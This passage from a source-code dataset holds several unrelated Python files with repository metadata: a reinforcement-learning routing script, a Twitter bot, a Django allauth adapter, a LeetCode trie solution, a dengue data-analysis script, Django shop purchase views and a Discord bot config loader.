(6,0)\nG1.nodes[6]['pos'] = (5,5)\nG1.nodes[7]['pos'] = (10,-9)\nG1.nodes[8]['pos'] = (10,-3)\nG1.nodes[9]['pos'] = (10,3)\nG1.nodes[10]['pos'] = (10,9)\n\nnode_pos=nx.get_node_attributes(G1,'pos')\nnx.draw_networkx(G1, node_pos,node_size=450)\narc_weight=nx.get_edge_attributes(G1,'weight')\nnx.draw_networkx_edge_labels(G1, node_pos, edge_labels=arc_weight)\n\n\nl=[[1,2,3,4,5,6,7,8,9,10], [7,8,9,10], ['E','R']]\ns = list(itertools.product(*l))\nbandera=s\nprint(bandera)\n\ndef pesoEnlace(est, a):\n origen = bandera[est][0] \n destino = a + 1\n for x in range(0,len(list_arcs1)):\n if (list_arcs1[x][0] == origen and list_arcs1[x][1] == destino):\n peso = list_arcs1[x][2]\n return peso \n\ndef randomWeight():\n pesos = np.random.randint(20, 70, size=16)\n return pesos\n\ndef reset():\n aleatorio = np.random.randint(0, 80, size=1)\n return aleatorio[0]\ndef resetTest():\n aleatorio = np.random.randint(0, 16, size=1)\n return aleatorio[0]\ndef render(col,cond):\n map = []\n for node in G1:\n if node in col and cond == 'R':\n map.append('green')\n elif node in col and cond == 'E':\n map.append('red')\n else:\n map.append('gray')\n #nx.draw(G1, node_color=map, with_labels=True)\n nx.draw_networkx(G1, node_pos,node_size=450,node_color=map)\n nx.draw_networkx_edge_labels(G1, node_pos, edge_labels=arc_weight)\n plt.show() \n \n \ndef ActionsXorigen(a1 ,a2 ,a3 ,a4 ,a5, a6, a7, a8, a9, a10 ,origen): \n if (origen==1):\n return a1\n elif (origen==2):\n return a2\n elif (origen==3):\n return a3\n elif (origen==4):\n return a4\n elif (origen==5):\n return a5\n elif (origen==6):\n return a6\n elif (origen==7):\n return a7\n elif (origen==8):\n return a8\n elif (origen==9):\n return a9\n else:\n return a10\n \ndef step(s, a, posiblesAcciones, G1, saltos, _s):\n info={}\n imposibles = 0\n for x in range(0,len(posiblesAcciones)):\n if (a == posiblesAcciones[x]):\n imposibles = 1 \n if(imposibles == 0): # el destino no s vecino o se queda quieto\n reward = -70\n s_ = s\n done = False\n else:\n if (bandera[s][0] == bandera [s][1]):\n reward = 100\n s_ = s\n done = True\n \n else:\n done = False\n suma = a + 1\n for x in range(0,len(bandera)):\n if (suma == bandera[x][0] and bandera[s][1] == bandera[x][1] and bandera[s][2] == bandera[x][2]):\n s_ = x\n break\n #print(bandera[s][0], suma)\n #print (p)\n #if (bandera[s][2]==\"E\"): \n if (s_ == _s):\n reward = -130\n else:\n reward = -10* saltos\n if (bandera[s][0] == 1 and bandera[s][1] == 10 and a == 2 or 
bandera[s][0] == 2 and bandera[s][1] == 7 and a == 2):\n reward = reward + 3\n if (bandera[s][2] == 'E'):\n if (pesoEnlace(s, a) > 79):\n reward = reward - 130\n \n \n #print (bandera[s],a,posiblesAcciones,s_,reward)\n _s = s\n return _s,s_,reward,done,info\n\n\nif __name__ ==\"__main__\":\n t = time.time()\n alpha = 0.4\n gamma = 0.999\n epsilon = 0.976\n episodes = 400000\n max_steps = 2500\n n_tests = 16\n n_states, n_actions = 80, 10\n agente = ql.QL_agent(alpha, gamma, epsilon, n_states,n_actions) #(alpha, gamma, epsilon, episodes, n_states, n_actions)\n \n episode_rewards = []\n \n for episode in range(episodes):\n print(\"Episode: {0}\".format(episode))\n s = reset() \n _s = s\n episode_reward = 0\n steps = 0\n done = False\n while steps < max_steps:\n steps += 1 \n a = agente.take_action(s,True)\n o = bandera[s][0] #origen\n acc = ActionsXorigen(Actionsx1,Actionsx2,Actionsx3,Actionsx4,Actionsx5,Actionsx6,Actionsx7,Actionsx8,Actionsx9,Actionsx10,o) #acciones para dicho origen \n _s, s_, reward, done, info = step(s,a,acc,G1,steps,_s)\n #print(bandera[s],a,acc,s_,reward)\n episode_reward += reward\n a_ = np.argmax(agente.Q[s_,:])\n agente.updateQ(reward,s,a,a_,s_,done) \n s, a = s_ , a_\n if done:\n end_ep = time.time()\n episode_rewards.append(episode_reward)\n break \n print(bandera)\n print(acciones)\n #Test model \n \n for test in range(n_tests):\n print(\"Test #{0}\".format(test))\n s = test #######################################reset\n _s = s\n done = False\n epsilon = 0\n st=0\n steps = 0\n color=[]\n while True:\n time.sleep(1)\n o = bandera[s][0] #origen\n acc = ActionsXorigen(Actionsx1,Actionsx2,Actionsx3,Actionsx4,Actionsx5,Actionsx6,Actionsx7,Actionsx8,Actionsx9,Actionsx10,o)\n #env.render()\n steps += 1\n if(st == 0):\n first_state=False;\n else:\n first_state=True;\n print(\"Estado actual: {0}\".format(bandera[s]))\n color.append(bandera[s][0])\n a = agente.take_action(s,first_state)\n print(\"Chose action {0} for state {1}\".format(a,s))\n #print(_s, s)\n first_state=True\n st=st+1;\n _s, s, reward, done, info = step(s,a,acc,G1,steps,_s)\n print(acc,reward,done)\n if done:\n render(color,bandera[s][2])\n print(\"Reached goal!\")\n color.clear()\n break \n time.sleep(6)\n \n plt.xlabel(\"Episodes\")\n plt.ylabel(\"Reward\")\n plt.title(\"\")\n plt.plot(episode_rewards,'b')\n plt.legend()\n plt.show() \n \"\"\" \n print(bandera)\n print(acciones)\n \n \"\"\"\n \n ","repo_name":"davidcamilo0710/Routing_Reinforcement_Learning","sub_path":"routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"40061686780","text":"import random\nfrom random import randint\nimport numpy\nimport requests\nimport tweepy\n\nfrom secrets import *\n\n#TODO: tweet every 3 hours\n\n# ---------- CLASS DECLARATIONS ----------\n\n# contains beeps\nclass Word:\n def __init__(self, string, max):\n self.string = string\n self.max = max\n\n# ---------- VARIABLE DECLARATIONS ----------\n\nbeeps = [\n # in order of probability\n Word(\"beep\", 3),\n Word(\"boop\", 3),\n Word(\"bleep\", 3),\n Word(\"bwoop\", 2),\n Word(\"woop\", 1),\n Word(\"bweep\", 1),\n Word(\"deet\", 2),\n Word(\"doot\", 3),\n Word(\"weeo\", 1),\n Word(\"bop\", 2),\n Word(\"bawoop\", 2),\n Word(\"badeep\", 2),\n Word(\"badoop\", 2)\n]\n\nrares = [\n Word(\"Poe[!/?]\", 1) #(1/100)\n]\n\nsounds = [\n Word(\"*bonk*\", 3),\n Word(\"*ding*\", 2),\n Word(\"*whir*\", 3),\n Word(\"*zzzt*\", 1),\n]\n\n# ---------- 
MAIN ----------\n\n# create an OAuthHandler instance\n# Twitter requires all requests to use OAuth for authentication\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\napi = tweepy.API(auth) # create an API object\n\n\ndef tweet():\n # create list of all beeps and sounds, multiplied by max use\n allBeeps = generateExpandedList(beeps)\n allWords = allBeeps + generateExpandedList(sounds)\n\n # start with random word\n phrase = [selectRandomWord(allWords)]\n\n dieRoll = randint(0, 2)\n\n if dieRoll >= 1:\n # add another word\n phrase.append(selectRandomWord(allWords))\n\n if dieRoll is 2:\n # add another word\n phrase.append(selectRandomWord(allWords))\n\n\n # Shuffle array\n random.shuffle(phrase)\n\n # Capitalize first letter\n phrase[0].title()\n\n # Add spaces between words\n phrase = ' '.join(phrase)\n\n # Update the authenticated user's status\n api.update_status(status=phrase)\n\n\n# ---------- HELPER FUNCTIONS ----------\n\n# remove and return a random beep from wordList\ndef selectRandomWord(wordList):\n # TODO: probability distribution\n beep = random.choice(wordList)\n wordList.remove(beep)\n return beep\n\n\ndef generateExpandedList(wordList):\n expandedList = []\n for word in wordList:\n expandedList += [word.string] * word.max\n return expandedList\n\n\ndef lengthenWord(word):\n return word[0:-2] + (word[-2] * randint(1, 5)) + word[-1] # multiply second last letter by 1-5\n\n\ntweet()\n","repo_name":"cartercook/Beep_Beep_8","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9703167134","text":"from allauth.account.adapter import DefaultAccountAdapter\nfrom django.contrib.sites.shortcuts import get_current_site\n\nfrom .models import EmailOTP\n\n\nclass UserAdapter(DefaultAccountAdapter):\n\n def send_confirmation_mail(self, request, emailconfirmation, signup):\n current_site = get_current_site(request)\n # activate_url = self.get_email_confirmation_url(\n # request,\n # emailconfirmation)\n otp = EmailOTP.objects.generate(emailconfirmation.email_address.user.id)\n ctx = {\n \"user\": emailconfirmation.email_address.user,\n \"current_site\": current_site,\n \"key\": otp.code,\n }\n if signup:\n email_template = 'account/email/email_confirmation_signup'\n else:\n email_template = 'account/email/email_confirmation'\n self.send_mail(email_template,\n emailconfirmation.email_address.email,\n ctx)\n","repo_name":"devna-dev/durar-backend","sub_path":"alshamelah_api/apps/users/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44112533410","text":"from calendar import c\r\n\r\n\r\nvar = float(input(\"Entre com um valor maior que 20. Digite um menor para parar o programa: \"))\r\nprint(var)\r\n\r\nmaiorAtual = var\r\nmenorAtual = var\r\n\r\n\r\nwhile var>=20:\r\n var = float(input(\"Entre com um valor maior que 20. 
Digite um menor para parar o programa: \"))\r\n\r\n if var > maiorAtual:\r\n maiorAtual = var\r\n\r\n if var < menorAtual:\r\n menorAtual = var\r\n\r\nprint(\"voltei normalmente para o programa.\")\r\n\r\nprint(f\"O maior é: {maiorAtual}\")\r\nprint(f\"O menor é: {menorAtual}\")\r\n","repo_name":"LuisAbrantes/PythonClassFirstYear","sub_path":"classes/class056.py","file_name":"class056.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4690013191","text":"class Solution:\n def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n result = []\n root = self.setTrie(words)\n \n for i in range(len(board)):\n for j in range(len(board[0])):\n self.dfs(root, i, j, result, board)\n \n return result\n \n \n def setTrie(self, words):\n root = {}\n for word in words:\n curr_node = root\n for char in word:\n if char not in curr_node:\n curr_node[char] = {}\n curr_node = curr_node[char]\n curr_node['word'] = word\n return root\n\n\n def dfs(self, node, i, j, result, board):\n if 'word' in node:\n result.append(node['word'])\n del node['word']\n \n if i < 0 or j < 0 or i >= len(board) or j >= len(board[0]):\n return\n if board[i][j] not in node:\n return\n \n char = board[i][j]\n board[i][j] = '#'\n self.dfs(node[char], i + 1, j, result, board)\n self.dfs(node[char], i - 1, j, result, board)\n self.dfs(node[char], i, j + 1, result, board)\n self.dfs(node[char], i, j - 1, result, board)\n board[i][j] = char\n\n\n","repo_name":"gilsun/leetcode","sub_path":"0212-word-search-ii/0212-word-search-ii.py","file_name":"0212-word-search-ii.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16426488572","text":"import click\nimport os\nimport os.path\nimport sys\nimport random\nimport string\nimport itertools\nimport time\nimport platform\nimport yaml\n\nfrom .hichipperHelp import *\n\nclass hichipperProject():\n\tdef __init__(self, script_dir, mode, out, peaks, restriction_frags,\n\t\tskip_resfrag_pad, skip_background_correction):\n\t\t\n\t\t#-----------------------------------------\n\t\t# Potentially parse .yaml file if supplied\n\t\t#-----------------------------------------\n\t\tif mode.endswith(('.yaml', '.yml')):\n\t\t\tm = parse_manifest(mode)\n\t\t\tself.peaks = m['peaks'][0]\n\t\t\tself.resfrags = m['resfrags'][0]\n\t\t\tself.hicprooutput = m['hicpro_output'][0]\n\t\t\tself.go = \"yaml\"\n\t\telse:\n\t\t\tself.go = \"call\"\n\t\t\tself.peaks = peaks\n\t\t\tself.resfrags = restriction_frags\n\t\t\n\t\t#------------------------------\n\t\t# Determine if restriction fragment calling is happening or not\n\t\t#------------------------------\n\t\tif not (skip_resfrag_pad or skip_background_correction):\n\t\t\tif not os.path.isfile(self.resfrags):\n\t\t\t\tsys.exit('ERROR: Could not find the restriction fragment file ' + self.resfrags + '; either correctly specify file in .yaml; use the --skip-resfrag-pad and --skip-background-correction flags; or supply them directly with the `--restriction-frags` flag')\n\t\n\t\t#----------------------------------\n\t\t# Assign straightforward attributes\n\t\t#----------------------------------\n\t\tself.script_dir = script_dir\n\t\tself.mode = mode\n\t\tself.out = out\n\t\t\n\t\t\n\t#--------------------------------------------------------------------------------\n\t# Define a method to dump the object as a .yaml/dictionary for use in other 
files\n\t#--------------------------------------------------------------------------------\n\tdef __iter__(self):\n\t\t\n\t\tyield 'script_dir', self.script_dir\n\t\tyield 'mode', self.mode\n\t\tyield 'output', self.output\n\t\tyield 'bamfile', self.bamfile\n\n\t\tyield 'cluster', self.cluster\n\t\tyield 'jobs', self.jobs\n\t\tyield 'minimum_barcode_fragments', self.minimum_barcode_fragments\n\t\tyield 'minimum_cell_fragments', self.minimum_cell_fragments\n\t\t\n\t\tyield 'extract_mito', self.extract_mito\n\t\tyield 'tssFile', self.tssFile\n\t\tyield 'blacklistFile', self.blacklistFile\n\t\tyield 'bedtoolsGenomeFile', self.bedtoolsGenomeFile\n\t\tyield 'R', self.R\n\t\t\n\t\tyield 'barcode_tag', self.barcode_tag\n\t\tyield 'bam_name', self.bam_name\n\t\t\n\t\tyield 'bowtie2', self.bowtie2\n\t\tyield 'bowtie2_index', self.bowtie2_index\n\t\t\n\t","repo_name":"aryeelab/hichipper","sub_path":"hichipper/hichipperProjectClass.py","file_name":"hichipperProjectClass.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"35204418341","text":"#!/usr/bin/python\n\nfrom pandas import *\nfrom numpy import *\nfrom pandasql import *\nfrom matplotlib.pyplot import *\n\nfrom utilidades import linreg\n\nimport seaborn as sns\n\n# melhorar visual dos graficos\nsns.set(style='whitegrid')\n\n# importar dados\ncsv = 'dados/dados-fixed.csv'\n\ndfDengue = read_csv(csv)\n\n# lista de estados\nq = \"\"\"\n\tSELECT uf FROM dfDengue\n\t\tWHERE\n\t\t\tano >= 1994 AND\n\t\t\tano <= 2013\n\t\tGROUP BY uf\n\t\"\"\"\n\nestados = sqldf(q, globals())\n\n# medias e desvios para graficos\nfor estado in estados.uf:\n\n\t# medicos\n\testados.loc[(estados.uf == estado), 'media_medicos'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].medicos_mil_hab)\n\testados.loc[(estados.uf == estado), 'std_medicos'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].medicos_mil_hab, ddof=1)\n\n\t# leitos\n\testados.loc[(estados.uf == estado), 'media_leitos'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].leitos_mil_hab)\n\testados.loc[(estados.uf == estado), 'std_leitos'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].leitos_mil_hab, ddof=1)\n\n\t# casos de dengue\n\testados.loc[(estados.uf == estado), 'media_dengue_cem_mil_hab'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].dengue_cem_mil_hab)\n\testados.loc[(estados.uf == estado), 'std_dengue_cem_mil_hab'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].dengue_cem_mil_hab, ddof=1)\n\n\t# casos de hemorragica\n\testados.loc[(estados.uf == estado), 'media_casos_hemorragica'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].casos_hemorragica)\n\testados.loc[(estados.uf == estado), 'std_casos_hemorragica'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].casos_hemorragica, ddof=1)\n\n\t# obitos hemorragica\n\testados.loc[(estados.uf == estado), 'media_obitos_hemorragica'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].taxa_obito_hemorragica)\n\testados.loc[(estados.uf == estado), 'std_obitos_hemorragica'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].taxa_obito_hemorragica, ddof=1)\n\n# plots\nx = asarray(range(0, len(estados.uf))) * 1.5\n\n# errorbar para a densidade de medicos\nerrorbar(x, estados.media_medicos, yerr=estados.std_medicos,\\\n\tfmt='s', markersize=10, color='#347DEB', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de densidade de medicos')\nxlabel('estado')\nylabel('medico/mil hab.')\nsavefig('graficos/@error-bar-media-medicos.png')\nclf()\n\n# errorbar para a 
densidade de leitos\nerrorbar(x, estados.media_leitos, yerr=estados.std_leitos,\\\n\tfmt='s', markersize=10, color='#124FEB', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de densidade de leitos')\nxlabel('estado')\nylabel('leito/mil hab.')\nsavefig('graficos/@error-bar-media-leitos.png')\nclf()\n\n# errorbar para casos de dengue\nerrorbar(x, estados.media_dengue_cem_mil_hab, yerr=estados.std_dengue_cem_mil_hab,\\\n\tfmt='s', markersize=10, color='#1156EB', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de taxa de casos de dengue')\nxlabel('estado')\nylabel('casos de dengue/cem mil hab.')\nsavefig('graficos/@error-bar-media-dengue.png')\nclf()\n\n# errorbar para casos de hemorragica\nerrorbar(x, estados.media_casos_hemorragica, yerr=estados.std_casos_hemorragica,\\\n\tfmt='s', markersize=10, color='#A052EF', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de casos de dengue hemorragica')\nxlabel('estado')\nylabel('numero de casos de dengue hemorragica')\nsavefig('graficos/@error-bar-casos-hemorragica.png')\nclf()\n\n# errorbar para obitos hemorragica\nerrorbar(x, estados.media_obitos_hemorragica, yerr=estados.std_obitos_hemorragica,\\\n\tfmt='s', markersize=10, color='black', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de taxa de obito devido a dengue hemorragica')\nxlabel('estado')\nylabel('taxa de obito devido a dengue hemorragica')\nsavefig('graficos/@error-bar-obitos-hemorragica.png')\nclf()\n\n# lista de anos\nq = \"\"\"\n\tSELECT ano, uf FROM dfDengue\n\t\tWHERE ano >= 1994 AND ano <= 2013\n\t\tGROUP BY ano\n\t\"\"\"\n\nanos = sqldf(q, globals())\n\n# verificar tendencia de subida da taxa de casos de dengue\nfor estado in estados.uf:\n\tx = anos.ano\n\ty = dfDengue[(dfDengue.ano >= 1994) &\\\n\t\t(dfDengue.ano <= 2013) &\\\n\t\t(dfDengue.uf == estado)].dengue_cem_mil_hab\n\tx = asarray(x)\n\ty = asarray(y)\n\tm, b = linreg(x, y)\n\tprint('{}: m_dengue = {}'.format(estado, m))\n\n\ty = dfDengue[(dfDengue.ano >= 1994) &\\\n\t\t(dfDengue.ano <= 2013) &\\\n\t\t(dfDengue.uf == estado)].taxa_obito_hemorragica\n\ty = asarray(y)\n\tm, b = linreg(x, y)\n\tprint('{}: m_hemorragica = {}'.format(estado, m))\n\n# escrever dataframe para depois agrupar\nestadosToCsv = estados[['uf', 'media_medicos', 'std_medicos',\\\n\t'media_leitos', 'std_leitos', 'media_dengue_cem_mil_hab', 'std_dengue_cem_mil_hab',\\\n\t'media_obitos_hemorragica', 'std_obitos_hemorragica']]\nestadosToCsv.to_csv('dados/to-kmeans.csv', index=False)\n","repo_name":"vasconcelose/dengue-ufs","sub_path":"wrangle.py","file_name":"wrangle.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11618775253","text":"import sys\r\nfrom collections import deque\r\n\r\nN = int(input())\r\nS = \".\" + input()\r\ngraph = [[] for _ in range(N+1)]\r\n\r\nfor _ in range(N-1):\r\n A = list(map(int, sys.stdin.readline().split())) \r\n graph[A[1]].append(A[0])\r\n graph[A[0]].append(A[1])\r\n\r\n\r\nhandle = []\r\nQ = deque()\r\nvisited = [False]*(N+1)\r\ndef bfs():\r\n Q.append([1,0]) # 0 = node번호, 1 = level (0부터 시작)\r\n handle.append(ord(S[1])-96)\r\n visited[1] = True\r\n while len(Q) != 0: \r\n u = Q.popleft()\r\n for v in graph[u[0]]:\r\n if visited[v] == True:\r\n continue\r\n visited[v] = True\r\n if u[1] != 0 and ord(S[u[0]])-96 != handle[u[1]]:\r\n break\r\n if len(handle) == u[1]+1:\r\n 
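# first arrival at this BFS depth: start the new level with this neighbour's letter value\r\n                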
handle.append(ord(S[v])-96)\r\n else:\r\n handle[u[1]+1] = max(handle[-1], ord(S[v])-96)\r\n Q.append([v,u[1]+1]) \r\n #print(Q)\r\n \r\nbfs()\r\nfor i in range(len(handle)):\r\n print(chr(handle[i]+96), end = \"\")\r\n","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/25498. 핸들 뭘로 하지/핸들 뭘로 하지.py","file_name":"핸들 뭘로 하지.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5299341239","text":"\n\"\"\" SHOP VIEWS \"\"\"\n\nimport qrcode\n\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.contrib import messages\nfrom django.utils import timezone\n\nfrom shop.forms.purchase_create_form import PurchaseCreateForm\nfrom bank.models import BankAccount\n\nfrom bank.currency_converter import currency_converter\n\nfrom shop.models import (\n Category,\n Product,\n Purchase\n)\nfrom shop.product_generator import *\n\ndef shop_page(request): # главная страница приложения МАГАЗИН\n try:\n if request.user.is_authenticated:\n user = request.user\n products = Product.objects.all().order_by('rating')\n return render(\n template_name='shop.html',\n request=request,\n context = {\n 'user': user,\n 'products': products\n }\n )\n else:\n products = Product.objects.all().order_by('rating')\n return render(\n template_name='shop.html',\n request=request,\n context = {\n 'products': products\n }\n )\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('done/')\n \ndef catalog_page(request): # каталог приложения МАГАЗИН\n try:\n if request.user.is_authenticated:\n user = request.user\n categories = Category.objects.all().order_by('name')\n return render(\n template_name='catalog.html',\n request=request,\n context = {\n 'user': user,\n 'categories': categories\n }\n )\n else:\n categories = Category.objects.all().order_by('name')\n return render(\n template_name='catalog.html',\n request=request,\n context = {\n 'categories': categories\n }\n )\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('/shop/done/')\n\nclass DoneView(View):\n\n \"\"\" СТРАННИЦА О СТАТУСЕ ОПЕРАЦИЙ. \"\"\"\n\n template_name = 'done.html'\n\n def get(self, request):\n return render(request, self.template_name)\n\nclass ProductsPageView(View):\n\n \"\"\" СТРАННИЦА ОБЗОРА ВСЕХ ТОВАРОВ ОДНОЙ КАТЕГОРИИ. \"\"\"\n\n template_name = 'products.html'\n\n def get(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk', None)\n category = Category.objects.get(pk=pk)\n products = Product.objects.filter(category=category)\n return render(\n request, \n self.template_name, \n context = {'pk': pk, 'products': products, 'category': category})\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('/shop/done/')\n\nclass ProductPageView(View):\n\n \"\"\" СТРАННИЦА ОБЗОРА ОДНОГО ТОВАРА. \"\"\"\n\n template_name = 'product.html'\n\n def get(self, request, *args, **kwargs):\n try:\n if request.user.is_authenticated:\n user = request.user\n pk = kwargs.get('pk', None)\n product = Product.objects.get(pk=pk)\n # product = Product.objects.filter(category=category)\n return render(\n request, \n self.template_name, \n context = {'pk': pk, 'user': user, 'product': product}\n )\n else:\n return redirect('/bank/login/')\n except Exception as e:\n messages.error(request, f'Что то пошло не так. 
Ошибка: {e}')\n return redirect('/shop/done/')\n \nclass PurchaseSuccessView(View):\n\n \"\"\" СТРАННИЦА О СТАТУСЕ ПОКУПКИ. \"\"\"\n\n template_name = 'purchase_done.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name)\n\n\n# ГЕНЕРАТОР кодов для QRкода\ndef qrcode_generator():\n code = random.randint(100, 999)\n return code\n\nclass PurchaseProductView(View):\n\n \"\"\" СТРАННИЦА СОВЕРШЕНИЯ ПОКУПКИ (тип. КОРЗИНА). \"\"\"\n\n template_name = 'purchase.html'\n\n def get(self, request, *args, **kwargs):\n try:\n form = PurchaseCreateForm(user=request.user)\n qr_image = False\n if request.user.is_authenticated:\n user = request.user\n pk = kwargs.get('pk', None)\n product = Product.objects.get(pk=pk)\n qr_data = qrcode_generator()\n img = qrcode.make(qr_data)\n type(img)\n print('data created')\n try:\n img.save(\"apps/shop/static/qr/test.jpg\")\n request.session['qr_code'] = qr_data # сохраняем QR код в сессию для сверки в дальнейшем\n print('img created')\n qr_image = True\n except Exception as e:\n print(f\"Ошибка сохранения изображения: {e}\")\n qr_image = False\n return render(\n request, \n self.template_name, \n context = {'pk': pk, 'user': user, 'product': product, 'form': form, 'qr_image': qr_image}\n )\n else:\n return redirect('login/')\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('/shop/done/')\n \n def post(self, request, *args, **kwargs):\n try:\n form = PurchaseCreateForm(request.POST, user=request.user)\n print('покапка 01') # удали\n if request.user.is_authenticated:\n if form.is_valid():\n print('покупка 02') # удали\n user = request.user #?\n qr_code = request.session.get('qr_code')\n pk = kwargs.get('pk', None)\n product = Product.objects.get(pk=pk)\n QRcode = form.cleaned_data['QRcode'] # вытаскиваем QR код из сессии для сверки\n quantity = form.cleaned_data['quantity']\n price = product.price*quantity\n bankaccount = form.cleaned_data['BankAccount']\n inaccount = BankAccount.objects.get(iban='7777777777777777') # МАГАЗИН продумай - ибан банка изменится в другой базе\n obj_BankAccount = BankAccount.objects.get(pk=bankaccount.pk)\n inst = int(form.cleaned_data['my_field'])\n converted_price = currency_converter(price, 'KZT', obj_BankAccount.currency)\n # converted_balance = currency_converter(bankaccount.balance, obj_BankAccount.currency, 'KZT')\n # if inst == 'option1' and obj_BankAccount.type == 'Gold': # Логика покупки, если без рассрочки и каспи ГОЛД\n if inst == 0: # Логика покупки, если без рассрочки\n if obj_BankAccount.balance < converted_price:\n messages.error(request, 'Недостаточно средств на счете списания.')\n return redirect('success/')\n elif product.quantity < quantity:\n messages.error(request, 'Количество товара в наличии не достаточно.')\n return redirect('success/')\n elif str(QRcode) != str(qr_code): # сверяем значения введенного и актуального QR кодов\n messages.error(request, 'Не верно указан код.')\n return redirect('success/')\n else:\n obj_BankAccount.balance -= converted_price\n product.quantity -= quantity\n inaccount.balance += price\n inaccount.save()\n obj_BankAccount.save() # Сохраняем изменения баланса в базе данных\n product.save() # Сохраняем изменения количества товара в базе данных\n Purchase.objects.create(\n user=user,\n product=product,\n quantity=quantity,\n price=price,\n iban=bankaccount.iban,\n purchase_type='Cash',\n )\n elif inst != 0: # Логика покупки, c рассрочкой N месяц\n if obj_BankAccount.balance < converted_price:\n 
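# installment branch: the currency-converted total must still fit within the account balance up front\n                            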
messages.error(request, 'Недостаточно средств на счете списания.')\n return redirect('success/')\n elif product.quantity < quantity:\n messages.error(request, 'Количество товара в наличии не достаточно.')\n return redirect('success/')\n elif str(QRcode) != str(qr_code): # сверяем значения введенного и актуального QR кодов\n messages.error(request, 'Не верно указан код.')\n return redirect('success/')\n else:\n print('покупка 03 рассрочка') # удали\n product.quantity -= quantity\n obj_BankAccount.save() # Сохраняем изменения баланса в базе данных\n product.save() # Сохраняем изменения количества товара в базе данных\n print('04') # удали\n Purchase.objects.create(\n user=user,\n product=product,\n quantity=quantity,\n price=price,\n iban=bankaccount.iban,\n purchase_type='Inst',\n inst_duration=inst,\n monthly_payment=(price/inst),\n # next_pay_date=timezone.now() + timezone.timedelta(days=30), # период в днях\n next_pay_date=timezone.now() + timezone.timedelta(minutes=5), # настрой единый период??\n remaining_amount=price\n )\n messages.success(request, 'Покупка успешно выполнена.') \n return redirect('success/')\n else:\n return redirect('login/') \n return redirect('success/')\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('/shop/done/')","repo_name":"Vassaga/kaspi","sub_path":"apps/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12151,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41780798530","text":"import logging\nimport os\nimport datetime\nimport sys\nimport dotenv\n\nfrom src.common.commonclasses import Character, Guild, LogonInfo, Calendar\nfrom src.header_crypt import GameHeaderCrypt\nfrom src.packet_codes import Codes\n\nimport lxml.objectify\n\n\nclass Globals:\n\n def __init__(self):\n\n dotenv.load_dotenv('./.env')\n\n with open(os.path.join(os.path.dirname(sys.argv[0]), 'config.xml'), 'r', encoding='utf-8') as xml_file:\n xml_obj = lxml.objectify.fromstring(xml_file.read())\n self.reset()\n self.logger = self.get_logger(xml_obj.logger)\n self.logon_info = self.get_logon_info(xml_obj)\n self.timezone = datetime.timezone(datetime.timedelta(hours=3), 'Moscow')\n self.reconnect_delay = int(xml_obj.wow.reconnect_delay)\n self.db = str(xml_obj.discord.db)\n self.token = os.environ.get('DISCORD_TOKEN')\n self.server_MOTD_enabled = bool(xml_obj.wow.server_motd_enabled)\n self.codes = Codes()\n self.maps = {self.codes.chat_channels.get_from_str(x.tag.upper()): x for x in\n xml_obj.discord.channels.getchildren()}\n self.guild_events = {self.codes.guild_events.get_from_str(e.tag.upper()): bool(e) for e in\n xml_obj.guild_events.getchildren()}\n\n self.logger.debug('Config values:\\n\\t'\n f'account = {self.logon_info.account}\\n\\t'\n f'password = {self.logon_info.password}\\n\\t'\n f'platform = {self.logon_info.platform}\\n\\t'\n f'locale = {self.logon_info.locale}\\n\\t'\n f'expansion = {self.logon_info.expansion}\\n\\t'\n f'version = {self.logon_info.version}\\n\\t'\n f'build = {self.logon_info.build}\\n\\t'\n 